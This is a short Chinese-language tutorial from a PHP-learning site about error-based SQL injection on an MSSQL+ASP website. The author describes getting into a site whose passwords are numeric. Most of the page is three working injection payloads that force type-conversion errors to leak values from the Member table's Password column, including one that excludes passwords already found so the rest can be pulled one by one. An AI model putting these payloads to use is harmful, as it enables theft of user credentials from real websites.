来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] MSSQL+ASP最近在弄个站点,密码是纯数字的,convert(int,())转换出来不报错,也不知道其他人用的什么函数或者类型来爆密码像11111111Prime;的这样的数据的,就自己想了下弄了个暂时可以用的...
|
MSSQL+ASP 最近在弄个站点,密码是纯数字的,convert(int,())转换出来不报错,也不知道其他人用的什么函数或者类型来爆密码像”11111111″的这样的数据的,就自己想了下弄了个暂时可以用的方法. 数据库查询如图: 图一:
图二: 图三:
图四:
图五:
表Member 字段Password 语句 ‘ or 1=convert(int,(select top 1 password from Member))–
语句’ or 1=convert(int,(select top 1 password from member)+’a')–
语句’ or 1=convert(int,(select top 1 password from member where password not in (’117517450′))+’a')–
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
